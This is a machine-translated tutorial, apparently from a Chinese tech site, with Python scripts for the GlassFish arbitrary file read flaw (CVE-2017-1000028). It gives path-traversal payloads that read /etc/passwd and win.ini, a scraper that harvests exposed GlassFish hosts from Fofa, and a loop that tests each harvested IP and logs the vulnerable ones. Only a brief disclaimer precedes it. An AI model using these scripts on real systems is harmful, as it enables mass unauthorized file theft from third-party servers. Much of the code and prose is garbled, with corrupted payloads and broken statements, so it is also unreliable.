Shulou(Shulou.com)05/31 Report--

Next, please follow the editor to study!

The significance of Python development learning: (1) to learn the principles of relevant security tools. (2) to master custom tools and expand development to solve the situation that there are no tools or manual trouble in the actual combat. (3) it is helpful in the secondary development of Bypass, daily tasks, batch testing and utilization. Disclaimer:

It is strictly forbidden to use the tools and techniques mentioned in this article to carry out illegal attacks, otherwise you will bear the consequences and the uploaders will not bear any responsibility.

Steps to test for vulnerabilities: (1) Application server GlassFish arbitrary file reading vulnerability. # Test application server glassfish arbitrary file reading vulnerability. Import requests # call requests module url= "enter IP address / domain name" # the following two are the payloadpayload_linux='/theme/META-INF/ of the vulnerability % c0% ae0% aemax% c0% ae0% c0% ae0% aeP% c0% aee% c0% aep% c0% aee% c0% ae0% e0% ae0% e0% ae0% eEetchand passwd' # detect the payload_windows='/theme/META-INF/%c0 of linux system % ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' # detects the windows system data_linux=requests.get (url+payload_linux). Status_code # returns the source code after getting the request Requests.get is a web crawler, status_code is to get the status code data_windows=requests.get (url+payload_windows). Status_code # is the return source code after the request, requests.get is a web crawler, status_code is to get the status code if data_windows==200 or data_linux==200: # 200 indicates that you can request this data. There is this loophole. Print ("vulnerability exists") else: print ("vulnerability does not exist")

Effect picture:

(2) batch search vulnerabilities. (GlassFish arbitrary file read (CVE-2017-1000028) import base64import requestsfrom lxml import etreeimport time# (1) get address information that may be vulnerable-obtain the target with the help of Fofa. # (2) batch request address information to determine whether it exists-single-threaded and multithreaded search_data=' "glassfish" & & port= "4848"'# this is the content of the search. Headers= {# to log in to the Cookie of the account. 'Cookie':'HMACCOUNT=52158546FBA65796;result_per_page=20' # request 20.} for yeshu in range (1Jing 11): # search the first 10 pages. Url=' https://fofa.info/result?page='+str(yeshu)+'&qbase64=' # this is the front of the link. Search_data_bs = str (base64.b64encode (search_data.encode ("utf-8")), "utf-8") # encrypts the data. Urls=url+search_data_bs print ('extracting first' + str (yeshu) + 'page') # prints the number of pages being extracted. Try: # request exception is also executed. Result=requests.get (urls,headers=headers,timeout=1) .content # requests.get request url, use this headers=headers header when requesting (that is, join the Cookie request), request delay timeout=1,content to print out the result. (call the HTML class to initialize the HTML text, successfully construct the XPath parsing object, and automatically correct the HMTL text) ip_data=soup.xpath ('/ a [@ target= "_ blank"] / @ href') # that is, the data that the crawler wants, extract the a tag, followed by @ target= "_ blank" Hrefs, which is the IP address. # print (ip_data) ipdata='\ n'.join (ip_data) # .join (): join an array of strings. Concatenates strings, tuples, and elements in the list with specified characters (delimiters) to generate a new string print (ip_data) with open (rclassiip.txtencoding dint) as f: # opens a file (ip.txt), where f is the defined name. F.close () # closes.

Effect picture:

(3) exploit the vulnerability. (GlassFish arbitrary file read (CVE-2017-1000028)) import requestsimport timepayload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/% C0% ae0% aemax% c0% ae0% e0% aeche% c0% ae0% e0% aemax% c0% ae0% e0% aegram% c0% ae0% c0% ae0% aegram% c0% aee% c0% aeg% for Ip in open ('ip.txt'): # Open the ip.txt file ip=ip.replace ('\ n' '') # replacement newline character is empty. Windows print ("chrck- >" + ip) # print which IP address is being detected. If result_code_linux==200 or result_code_windows==200: with open (ringing result.txtwriting no.') as f: # write to result.txt file. F.write (ip) # write to ip if there is a vulnerability. Time.sleep (5) except Exception as e: pass

Effect picture:

(4) the exploitation of loopholes.

At this point, the study of "batch search and exploitation of vulnerabilities in Python script development" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.